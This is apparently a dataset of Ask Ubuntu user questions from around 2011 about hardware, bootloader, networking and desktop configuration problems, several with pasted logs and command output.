62993	how do i get input from more than 4 wireless controllers on with xboxdrv ?	i 'm using xboxdrv on ubuntu to gather input from xbox controllers . with wired controllers i can get 4+ controller inputs very easily : xboxdrv -- daemon -i 0 -- detach-kernel-driver \ -- next-controller -i 1 -- detach-kernel-driver \ -- next-controller -i 2 -- detach-kernel-driver \ -- next-controller -i 3 -- detach-kernel-driver \ -- next-controller -i 4 -- detach-kernel-driver \ -- next-controller -i 5 -- detach-kernel-driver but with wireless controllers i can only get up to 4 xboxdrv -- daemon -w 0 -- detach-kernel-driver \ -- next-controller -w 1 -- detach-kernel-driver \ -- next-controller -w 2 -- detach-kernel-driver \ -- next-controller -w 3 -- detach-kernel-driver \ -- next-controller -w 4 -- detach-kernel-driver \ -- next-controller -w 5 -- detach-kernel-driver -- [ error ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- wireless id must be within 0 and 3 what do i need to do to be able to get input from more than four wireless controllers ? i know that each wireless receiver can only handle 4 controllers each , but should n't it work if i have 2 wireless receivers and eight controllers ?
62994	how to get hdmi output working with nvidia graphics card	on my nvidia card , if i enable one of the nvidia drivers then it does not recognize the hdmi output ( even after installing nvidia-settings and nvtv ) . however , if i use ubuntu 's default driver ... it sees the tv but it does not actually display a picture on the tv
62997	is it possible to uninstall individual firefox plugins ?	i have purposely installed two plugins into firefox : flash player & gecko-mediaplayer ( i installed gecko-mediaplayer solely so i could get the windows media player plug-in ) . every single other plugin listed in my firefox plugins page is unused/unneeded . several of the plugins list `` gecko media player '' underneath them . yet i installed gecko-mediaplayer only to get the `` windows media player plug-in '' . is it possible to uninstall all of the following plugins except for `` shockwave flash '' and `` windows media player plug-in '' ? how do i do it ?
63021	alternative to cd/dvd creator	is there an alternative to cd/dvd creator that i can install or enable so that i never have to see that program again . i do n't like that it looks very much like a regular ubuntu/gnome directory browser . the default behavior has it that any files burned to dvd remain and the user has to manually delete them . even when you insert a blank dvd it is not recognized as blank and you have to delete the file you burned previously . this is not a nice user interface because it forces the user to delete important files from a window that looks very much like a regular folder viewer .
63022	convert filesystem ntfs - > ext4 ?	i have 2 tb of data on an ntfs drive which i would like to convert to ext4 filesystem . my os runs on a ( comparatively ) small 60gb ssd . is there any way to convert the filesystem , apart from backing up and reformatting ?
63023	can not install hp printer driver	i ca n't use my hp printer in oneiric beta ~ $ cd downloads ~/downloads $ sh hplip-3.11.7.run creating directory hplip-3.11.7 verifying archive integrity ... all good . uncompressing hplip 3.11.7 self extracting archive ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . hp linux imaging and printing system ( ver . 3.11.7 ) hplip installer ver . 5.1 copyright ( c ) 2001-9 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . installer log saved in : hplip-install_mon-26-sep-2011_09:46:00.log / note : defaults for each question are maked with a '* ' . press < enter > to accept the default . installation mode -- -- -- -- -- -- -- -- - automatic mode will install the full hplip solution with the most common options . custom mode allows you to choose installation options to fit specific requirements . please choose the installation mode ( a=automatic* , c=custom , q=quit ) : a initializing . please wait ... \ ( install.py:2428 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( install.py:2428 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( install.py:2428 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( install.py:2428 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , introduction -- -- -- -- -- -- this installer will install hplip version 3.11.7 on your computer . please close any running package management systems now ( yast , adept , synaptic , up2date , etc ) . distro/os confirmation -- -- -- -- -- -- -- -- -- -- -- distro appears to be ubuntu 11.10 . is `` ubuntu 11.10 '' your correct distro/os and version ( y=yes* , n=no , q=quit ) ? y enter user password -- -- -- -- -- -- -- -- -- - please enter the user ( vet ) 's password : password accepted running pre-install commands -- -- -- -- -- -- -- -- -- -- -- -- -- -- ok install missing required dependencies -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - warning : there are 7 missing required dependencies . note : installation of dependencies requires an active internet connection . warning : missing required dependency : gcc ( gcc - gnu project c and c++ compiler ) warning : this installer can not install 'gcc ' for your distro/os and/or version . error : installation can not continue without this dependency . please manually install this dependency and re-run this installer .
63025	why is grub not loading after installing 11.10 beta2 after windows 7 ?	i 'm on a new machine , single sata drive . installed windows 7 . installed 11.10 beta 2 , twice : first with a separate home partition . grub did n't load and boot was right to win7 second i blew away the new linux partitions and installed 'along windows ' all defaults . result was same as above . i attempted this : no grub after installing ubuntu 10.10 beside windows 7 , straight to windows and now on boot i get : `` error file not loaded , '' followed by the grub rescue prompt . no grub . no windows 7 . this has always worked in the past . windows 7 first , then ubuntu . is this a problem with the 11.10 beta ?
63028	hsdpa modem only working on certain usb ports	depending on which usb port i use to connect my hsdpa modem , the network manager will connect to the internet or not . i used to work ( i.e . established a internet connection automatically ) on all ports , but over time it simply stopped on some ports . lsusb output in all cases looks like that ( device id varies depending on usb port ) : bus 001 device 009 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e270 hsdpa/hsupa modem any ideas what could cause this behaviour ? what can i do to fix this ? added one additional information about the modem : if connected via usb it will be available as as harddrive and as a hsdpa modem ( kind of a duality ... ) . in the error case , it will only be shown as a harddrive . additional info as requested modem not working bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 413c:8000 dell computer corp. bc02 bluetooth adapter bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 007 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e270 hsdpa/hsupa modem bus 001 device 005 : id 046d : c00c logitech , inc. optical wheel mouse bus 001 device 004 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 003 : id 413c:0058 dell computer corp . port replicator bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub laptop : ~ $ dmesg | grep 'usb' [ 0.225371 ] usbcore : registered new interface driver usbfs [ 0.225387 ] usbcore : registered new interface driver hub [ 0.225418 ] usbcore : registered new device driver usb [ 0.504291 ] usb usb1 : configuration # 1 chosen from 1 choice [ 0.504767 ] usb usb2 : configuration # 1 chosen from 1 choice [ 0.505046 ] usb usb3 : configuration # 1 chosen from 1 choice [ 0.505601 ] usb usb4 : configuration # 1 chosen from 1 choice [ 1.061064 ] usb 1-6 : new high speed usb device using ehci_hcd and address 3 [ 1.192636 ] usb 1-6 : configuration # 1 chosen from 1 choice [ 1.447006 ] usb 2-2 : new full speed usb device using uhci_hcd and address 2 [ 1.634908 ] usb 2-2 : configuration # 1 chosen from 1 choice [ 1.708164 ] usb 1-6.1 : new high speed usb device using ehci_hcd and address 4 [ 1.801668 ] usb 1-6.1 : configuration # 1 chosen from 1 choice [ 2.076279 ] usb 1-6.1.1 : new low speed usb device using ehci_hcd and address 5 [ 2.174932 ] usb 1-6.1.1 : configuration # 1 chosen from 1 choice [ 6.580315 ] usb 1-6.1.2 : new high speed usb device using ehci_hcd and address6 [ 6.683479 ] usb 1-6.1.2 : configuration # 1 chosen from 1 choice [ 20.018671 ] usbcore : registered new interface driver btusb [ 20.131703 ] usbcore : registered new interface driver usb-storage [ 20.131988 ] usb-storage : device found at 6 [ 20.131991 ] usb-storage : waiting for device to settle before scanning [ 20.207981 ] usb 1-6.1.2 : usb disconnect , address 6 [ 20.291499 ] usbcore : registered new interface driver hiddev [ 20.297052 ] input : logitech usb mouse as /devices/pci0000:00/0000:00:1d.7/usb1/1-6/1-6.1/1-6.1.1/1-6.1.1:1.0/input/input6 [ 20.297465 ] generic-usb 0003:046d : c00c.0001 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb mouse ] on usb-0000:00:1d.7-6.1.1/input0 [ 20.297534 ] usbcore : registered new interface driver usbhid [ 20.297803 ] usbhid : v2.6 : usb hid core driver [ 26.552360 ] usb 1-6.1.2 : new high speed usb device using ehci_hcd and address 7 [ 26.663506 ] usb 1-6.1.2 : configuration # 1 chosen from 1 choice [ 26.709628 ] usb-storage : device found at 7 [ 26.709631 ] usb-storage : waiting for device to settle before scanning [ 26.732387 ] usb-storage : device found at 7 [ 26.732390 ] usb-storage : waiting for device to settle before scanning [ 31.709568 ] usb-storage : device scan complete [ 31.733676 ] usb-storage : device scan complete modem working bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c00c logitech , inc. optical wheel mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 413c:8000 dell computer corp. bc02 bluetooth adapter bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e270 hsdpa/hsupa modem bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg | grep 'usb' [ 0.134811 ] usbcore : registered new interface driver usbfs [ 0.134826 ] usbcore : registered new interface driver hub [ 0.134858 ] usbcore : registered new device driver usb [ 0.360327 ] usb usb1 : configuration # 1 chosen from 1 choice [ 0.360783 ] usb usb2 : configuration # 1 chosen from 1 choice [ 0.361061 ] usb usb3 : configuration # 1 chosen from 1 choice [ 0.361611 ] usb usb4 : configuration # 1 chosen from 1 choice [ 1.144122 ] usb 2-2 : new full speed usb device using uhci_hcd and address 2 [ 1.346896 ] usb 2-2 : configuration # 1 chosen from 1 choice [ 1.588072 ] usb 3-1 : new low speed usb device using uhci_hcd and address 2 [ 1.761204 ] usb 3-1 : configuration # 1 chosen from 1 choice [ 5.972042 ] usb 1-1 : new high speed usb device using ehci_hcd and address 4 [ 6.115438 ] usb 1-1 : configuration # 1 chosen from 1 choice [ 19.990565 ] usbcore : registered new interface driver usbserial [ 19.991429 ] usb-storage : device found at 4 [ 19.991432 ] usb-storage : waiting for device to settle before scanning [ 20.017260 ] usbcore : registered new interface driver usb-storage [ 20.017305 ] usbcore : registered new interface driver usbserial_generic [ 20.017308 ] usbserial : usb serial driver core [ 20.017817 ] usb-storage : device found at 4 [ 20.017820 ] usb-storage : waiting for device to settle before scanning [ 20.070796 ] usbcore : registered new interface driver btusb [ 20.229525 ] usb 1-1 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 20.229776 ] usb 1-1 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 20.229843 ] usbcore : registered new interface driver option [ 20.230396 ] usbcore : registered new interface driver hiddev [ 20.246280 ] input : logitech usb mouse as /devices/pci0000:00/0000:00:1d.1/usb3/3-1/3-1:1.0/input/input6 [ 20.246438 ] generic-usb 0003:046d : c00c.0001 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb mouse ] on usb-0000:00:1d.1-1/input0 [ 20.246479 ] usbcore : registered new interface driver usbhid [ 20.246483 ] usbhid : v2.6 : usb hid core driver [ 25.436579 ] usb-storage : device scan complete [ 25.437674 ] usb-storage : device scan complete
63033	ubuntu one files running android 2.3 wo n't auto-upload pictures	i am running the ubuntu one files ( latest version ) on my droid x with android 2.3 . during the install , i chose the upload all pictures option which did not upload any of my files . i have the auto-upload and immediately boxes checkedphto in settings . when i take a photo , it does not auto-upload still . i can manually add photos ( one at a time ) through oi files to ubuntu one files and it syncs to the cloud ; however not to my desktop pictures-droidx folder running ubuntu 11.04 - all other folders work on the desktop except for `` pictures '' which is another issue . i can find no way to configure ubuntu one files to ensure it is monitoring my dcim/camera folder on my sd card which is where my camera stores pictures taken from the phone . any ideas or help would be great .
63034	how to set apt options like `` acquire : :http : :no-cache=true '' in preseed.cfg	something on our company 's network is causing some apt updates to fail during an unattended install . we recently discovered that we can fix the apt problem on a previously successful installation using the following options : sudo apt-get update -o acquire : :http : :no-cache=true -o acquire : :http : :pipeline-depth=0 or by putting these options in /etc/apt/apt.conf.d/80http acquire : :http : :no-cache true ; acquire : :http : :pipeline-depth 0 ; however , i still do n't know how to modify a preseed.cfg file so that it will use these options for apt . thanks in advance for your help .
63036	how do i create a unity launcher icon for redcar in an rvm environment ?	redcar is a graphical application that is installed via a ruby gem , and i have installed it in a ruby environment that is managed by rvm . a launcher icon is n't automatically installed , so i need to create one myself . i 've tried using unity 's `` keep in launcher '' option for the icon that is displayed while redcar is running : but when i exit redcar and then click the launcher icon , the icon only flashes and redcar does not open . how can i create a working launcher icon ? i tried creating ~/.local/share/applications/redcar.desktop with the following contents : [ desktop entry ] type=application version=1.0 name=redcar comment=a programmer 's text editor written in ruby ! icon=/home/ak/.rvm/gems/ruby-1.9.2-p290/gems/redcar-0.11/share/icons/redcar-icon-beta.png exec=/home/ak/.rvm/gems/ruby-1.9.2-p290/bin/redcar categories=development ; ide ; the file is executable and is shown with the redcar icon when i browse to ~/.local/share/applications in nautilus , but nothing happens when i double-click it . redcar runs fine when i enter /home/ak/.rvm/gems/ruby-1.9.2-p290/bin/redcar in a terminal .
63037	/etc/environment and /etc/profile.d/* ignored for the root user	how do i set global environment variables in ubuntu , in such a way , that they would apply also to root user ? setting path or java_home in /etc/environment or in /etc/profile.d/my_settings.sh both works for usual user , but not for root . i 'm logging in as root using sudo bash or sudo zsh . note : using ubuntu 10.04 .
63039	how to reset the openbox configuration ?	my openbox does not work any longer . i 'm using xfce4 and the configuration dialog for window-decoration is blank and i only have one workspace . i have n't found any standard config in /etc/skel and no dirs in in my home named openbox but /.local/share/openbox/sessions . $ openbox -- replace -- debug did n't help me . how do i reset the configuration ? update i have copied /etc/xdg/openbox/rc.xml to ~/.config/openbox , but nothing has changed . the preferences dialog is empty and even if the file contains < desktops > < ! -- this stuff is only used at startup , pagers allow you to change them during a session these are default values to use when other ones are not already set by other applications , or saved in your session use obconf if you want to change these without having to log out and back in -- > < number > 4 < /number > < firstdesk > 1 < /firstdesk > < names > < ! -- set names up here if you want to , like this : < name > desktop 1 < /name > < name > desktop 2 < /name > -- > < name > desktop 1 < /name > < name > desktop 2 < /name > < name > desktop 3 < /name > < name > desktop 4 < /name > < /names > < popuptime > 875 < /popuptime > < ! -- the number of milliseconds to show the popup for when switching desktops . set this to 0 to disable the popup . -- > < /desktops > i only have one desktop . so , it seems openbox does not read the configuration file at all . update 2 and http : //www.w3schools.com/xml/xml_validator.asp claims that rc.xml is valid xml . update 3 plainly running obconf brings back my desktops . i do n't get why , it works .
63040	how do i update empathy messenger ?	is there a ppa for empathy messenger ? i tried adding the telepathy ppa but then i realised that that is not the stable ppa , and i got an error message every time i launched the update-manager anyway . so is there a stable ppa for empathy ? or is there another way to update it ? thanks very much , and sorry if i should n't have asked this here . edit : i 'm using ubuntu 11.04
63046	how to mount mac os x lion fileshare ?	how can i mount os x 10.7 lion shares on my ubuntu box ( 10.10 , 11.4 ) ? since os x 10.7 lion update , network integration with ubuntu is a nightmare . previously we could print on osx printers and mount osx file shares in a snap , using smb/cifs . now i got to print on osx lion printers using cups and ipp sharing ... done ! no samba : it works . worst i can not anymore access files on os x lion shares ( it was ok up to snow leopard ) . exactly from nautilus i can still browse the osx server shares , mount one of them ( using nautilus and smb : // url ) , i can even browse all the share 's directory tree , but whenever i try to open a file ( even for read-only ) i receive the error impossible to open file < < smb : // < host > / < share > / < file-path > > unexpected error : function not implemented ( this is konqueror ) ; when trying to mount.cifs , it reports to me root @ ul30al64 : /home/fmoli # mount.cifs // < host > / < myshare > /media/gw-fm -o user= < myname > , password= < mypwd > , nounix , noserverino , sec=krb5 mount error ( 126 ) : required key not available refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) rumours in the net tell that samba4 is the recipe for linux/ubuntu . but i tried to set-up samba4 without any luck ( very lack of guides around ... ) other ones suggest to install netatalk on ubuntu . but netatalk is a `` server-only '' package : i need to mount osx shares on ubuntu , not ubuntu shares on osx !
63052	ubuntu wo n't boot , only displays grub terminal	i have a problem with ubuntu 11.04 . i 've installed ubuntu 11.04 from windows , it worked fine for days , but today it wo n't boot . when i start the machine , grub loads . there is the windows 7 loader , i select ubuntu from there and after that , i should see the ubuntu grub menu , where i 'd select the mode to boot ubuntu . however , i ca n't see that any more . i directly get to a grub terminal . can anyone help me with this ? how would i recover my data or reset the boot loader ?
63053	make gedit recognize more encodings	i did some research over this issue and realized that everyone was suggesting to use iconv or recode to change the encoding of the file to utf-8 . the thing is that i do not want to change the encoding of the file . i just want to use gedit in order to edit the file ( my file 's encoding is iso-8859-7 ) and save it using the same original encoding . is there a way to do that ? i know for a fact that kate has a menu option that lets you determine the encoding of the file . even the default text editor of windows ( ! ! ! ! ! ! ! ! ! ! ) , notepad , allows you to select the encoding . i mean , i like having an extensible default text editor and all , but there are some features that are not optional .
63056	restore logout gnome applet in the classic session ?	determined to get the excellent original clock applet back from a few releases ago , i followed the instructions here . ... and removed indicator-datetime i now have the wonderful world-clock + map applet running , but the downside is the `` all-in-one '' drop-down logout/suspend etc button has also gone - see : ( compare : top-right of : does anyone know how i might retrieve it ? i am running 11.04 , using `` classic '' ( ie gnome ) login . i would prefer not to use unity . i have also lost the volume applet too .
63059	why is my ethernet connection connecting and disconnecting repeatedly ?	just trying to get my ethernet connection to work in oneiric , and when i plug the cable in it connects and disconnects forever . /var/syslog says this ( repeats it over and over again ) : sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) successful , device activated . sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 5 of 5 ( ip configure commit ) complete . sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 4 of 5 ( ip4 configure get ) complete . sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < warn > dnsmasq exited with error : network access problem ( address in use ; permissions ; etc ) ( 2 ) sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : device state change : activated - > failed ( reason 'sharing-start-failed ' ) [ 100 120 18 ] sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < warn > activation ( eth0 ) failed . sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : deactivating device ( reason 'none ' ) [ 0 ] sep 26 17:06:47 x58a-ud3r avahi-daemon [ 1321 ] : withdrawing address record for 10.42.43.1 on eth0 . sep 26 17:06:47 x58a-ud3r avahi-daemon [ 1321 ] : leaving mdns multicast group on interface eth0.ipv4 with address 10.42.43.1 . sep 26 17:06:47 x58a-ud3r avahi-daemon [ 1321 ] : interface eth0.ipv4 no longer relevant for mdns . sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > clearing nscd hosts cache . sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table nat -- delete postrouting -- source 10.42.43.0/255.255.255.0 ! -- destination 10.42.43.0/255.255.255.0 -- jump masquerade sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete forward -- destination 10.42.43.0/255.255.255.0 -- out-interface eth0 -- match state -- state established , related -- jump accept sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete forward -- source 10.42.43.0/255.255.255.0 -- in-interface eth0 -- jump accept sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete forward -- in-interface eth0 -- out-interface eth0 -- jump accept sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete forward -- out-interface eth0 -- jump reject sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete forward -- in-interface eth0 -- jump reject sep 26 17:06:47 x58a-ud3r ntpdate [ 15004 ] : ca n't find host ntp.ubuntu.com : name or service not known ( -2 ) sep 26 17:06:47 x58a-ud3r ntpdate [ 15004 ] : no servers can be used , exiting sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete input -- in-interface eth0 -- protocol udp -- destination-port 67 -- jump accept sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete input -- in-interface eth0 -- protocol tcp -- destination-port 67 -- jump accept sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete input -- in-interface eth0 -- protocol udp -- destination-port 53 -- jump accept sep 26 17:06:47 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- delete input -- in-interface eth0 -- protocol tcp -- destination-port 53 -- jump accept sep 26 17:06:47 x58a-ud3r avahi-daemon [ 1321 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :a800:4ff : fe00 : a04 . sep 26 17:06:47 x58a-ud3r avahi-daemon [ 1321 ] : new relevant interface eth0.ipv6 for mdns . sep 26 17:06:47 x58a-ud3r avahi-daemon [ 1321 ] : registering new address record for fe80 : :a800:4ff : fe00 : a04 on eth0.* . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > auto-activating connection 'wired ' . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) starting connection 'wired' sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 4 of 5 ( ip4 configure get ) scheduled ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) beginning ip6 addrconf . sep 26 17:06:50 x58a-ud3r avahi-daemon [ 1321 ] : withdrawing address record for fe80 : :a800:4ff : fe00 : a04 on eth0 . sep 26 17:06:50 x58a-ud3r avahi-daemon [ 1321 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :a800:4ff : fe00 : a04 . sep 26 17:06:50 x58a-ud3r avahi-daemon [ 1321 ] : interface eth0.ipv6 no longer relevant for mdns . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 4 of 5 ( ip4 configure get ) started ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > activation ( eth0 ) stage 5 of 5 ( ip configure commit ) started ... sep 26 17:06:50 x58a-ud3r avahi-daemon [ 1321 ] : joining mdns multicast group on interface eth0.ipv4 with address 10.42.43.1 . sep 26 17:06:50 x58a-ud3r avahi-daemon [ 1321 ] : new relevant interface eth0.ipv4 for mdns . sep 26 17:06:50 x58a-ud3r avahi-daemon [ 1321 ] : registering new address record for 10.42.43.1 on eth0.ipv4 . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > caught signal 15 , shutting down normally . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > clearing nscd hosts cache . sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface eth0 -- protocol tcp -- destination-port 53 -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface eth0 -- protocol udp -- destination-port 53 -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface eth0 -- protocol tcp -- destination-port 67 -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface eth0 -- protocol udp -- destination-port 67 -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- in-interface eth0 -- jump reject sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- out-interface eth0 -- jump reject sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- in-interface eth0 -- out-interface eth0 -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- source 10.42.43.0/255.255.255.0 -- in-interface eth0 -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- destination 10.42.43.0/255.255.255.0 -- out-interface eth0 -- match state -- state established , related -- jump accept sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > executing : /sbin/iptables -- table nat -- insert postrouting -- source 10.42.43.0/255.255.255.0 ! -- destination 10.42.43.0/255.255.255.0 -- jump masquerade sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > starting dnsmasq ... sep 26 17:06:50 x58a-ud3r networkmanager [ 1344 ] : < info > ( eth0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] sep 26 17:06:50 x58a-ud3r dnsmasq [ 15064 ] : failed to create listening socket for 10.42.43.1 : address already in use sep 26 17:06:50 x58a-ud3r dnsmasq [ 15064 ] : failed to start up
63063	ubuntu 11.10 window configuration	i have a netbook with 1024x568 resolution . but some windows do n't fit to the screen . they are to big . how to change that
63064	in 11.10 how do i swich between unity and gnome shell sessions ?	is there an easy way to switch between unity and gnome shell and back whenever i want to change my desktop sessions ?
63065	how can i choose which os grub will reboot me intoâbefore i reboot ?	lilo had a simple feature that allowed one to select the boot menu entry that should be used on the next reboot while in linux , thus one could select the os to be booted into on shutdown and did n't had to wait till the computer rebooted to the boot menu and select the next entry manually . for grub that feature has existed as unofficial patch as well . this was quite some years ago . has that feature made it into mainline grub in the meantime ? is it available under ubuntu and is there any way to integrate it with the gui ( i.e . have not only a `` reboot '' entry , but a `` reboot into windows '' entry in the shutdown menu ) ?
63069	unity integration for updated thunderbird profile	i updated to 11.10 , reusing my home partition so also my thunderbird profile folder and now i see that the messaging menu and unity integration extension 0.8 is not installed . i 'd like to keep my profile and do not start a new one , how do i install this missing extension ? it appears as installed on new profiles , so it is on the system .
63072	gzip time to decompress ?	i wanted to backup my entire server , which is hosted . so i used dd and gzip to make the file smaller . the disk was 500gb , but with less than 5 % used . i managed to dd the whole partition into a 200 gb gzip file over the internet to my home in 8 hours . now i am trying to decompress the file into a partition onto a new disk . it has already taken more than 8 hours and of course i have no way of determining progress . how long should it take to decompress in relation to compressing ? i assume the local processor is the key ingredient in determining how long it takes ? ( rather than the bandwidth of the network ) is there a way of seeing progress ? can i do this a better way next time ?
63074	why is my video ram 256mb when it should be 2gb ?	i upgraded from ati radeon hd 5670 256mb vram ( or whatsoever ) to ati radeon hd 6450 2gb vram . when i was booting my pc it seemed quite slow . i began to panic when i saw 256 mb in pci devices listed in 'hardinfo ' .
63075	is there a way to create a shortcut to proxy preferences in the launcher ?	in my university campus i need to connect to internet through a proxy . as i am using a notebook , in ubuntu 11.04 i set a shortcut in the launcher to the proxy settings in order to `` easily '' change the proxy every time i go to the campus . however , i ca n't figure out how to do this under ubuntu 11.10 . is there a way to create a shortcut pointing directly to proxy settings ? even better , but less likely , is there a way to set the network settings so it changes the proxy every time i connect to my campus wifi ? thanks you .
